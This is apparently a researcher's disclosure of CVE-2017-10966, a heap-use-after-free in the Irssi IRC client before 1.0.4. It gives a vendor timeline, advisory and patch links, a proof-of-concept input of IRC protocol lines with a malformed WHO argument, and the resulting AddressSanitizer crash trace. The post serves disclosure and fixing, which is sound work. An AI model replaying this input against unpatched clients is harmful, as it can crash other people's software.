CVE-2017-10966: Heap-use-after-free in Irssi <1.0.4

35 days after reading https://irssi.org/2017/05/12/fuzzing-irssi/, I was able to trigger a heap-use-after-free in irssi 1.0.2. Timeline: Report to vendor: 16 June 2017 Acknowledge by vendor: 16 June 2017 Fixed by vendor: 7 July 2017 Advisory: http://seclists.org/oss-sec/2017/q3/80 Patch: https://github.com/irssi/irssi/commit/5e26325317c72a04c1610ad952974e206 ``` ./irssi < test001 CAP LS NICK root USER root root /dev/stdin :root MODE +i WHOIS root WHO +00000000000000000000o00 ==30112==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000008100 at pc 0x0000006d3a48 bp 0x7ffdd447b320 sp 0x7ffdd447b318 READ of size 8 at 0x607000008100 thread T0 #0 0x6d3a47 in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:455:30 #1 0x7f97420273bf in g_hash_table_foreach (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x393bf) #2 0x6d3786 in sig_channel_destroyed /root/irssi-1.0.2/src/core/nicklist.c:465:2 #3 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3 #4 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3 #5 0x699ec1 in channel_destroy /root/irssi-1.0.2/src/core/channels.c:83:2 #6 0x672ce0 in event_join /root/irssi-1.0.2/src/irc/core/channel-events.c:258:3 #7 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3 #8 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3 #9 0x62cd3d in irc_server_event /root/irssi-1.0.2/src/irc/core/irc.c:308:7 #10 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3 #11 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3 #12 0x62d33a in irc_parse_incoming_line /root/irssi-1.0.2/src/irc/core/irc.c:362:3 #13 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3 #14 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3 #15 0x62d6ba in irc_parse_incoming /root/irssi-1.0.2/src/irc/core/irc.c:383:3 #16 0x6bb9b2 in irssi_io_invoke /root/irssi-1.0.2/src/core/misc.c:55:3 #17 0x7f9742038229 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a229) #18 0x7f97420385df (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a5df) #19 0x7f974203868b in g_main_context_iteration (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a68b) #20 0x57e4a7 in main /root/irssi-1.0.2/src/fe-text/irssi.c:326:3 #21 0x7f97408273f0 in __libc_start_main /build/glibc-cxyGtm/glibc-2.24/csu/../csu/libc-start.c:291 #22 0x42e979 in _start (/root/irssi-1.0.2/src/fe-text/irssi+0x42e979) 0x607000008100 is located 64 bytes inside of 72-byte region [0x6070000080c0,0x607000008108) freed by thread T0 here: #0 0x4e4170 in __interceptor_cfree.localalias.1 (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4170) #1 0x6d39eb in nicklist_destroy /root/irssi-1.0.2/src/core/nicklist.c:112:2 #2 0x6d39eb in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:456 previously allocated by thread T0 here: #0 0x4e4520 in calloc (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4520) #1 0x7f974203d9e0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f9e0) SUMMARY: AddressSanitizer: heap-use-after-free /root/irssi-1.0.2/src/core/nicklist.c:455:30 in nicklist_remove_hash ```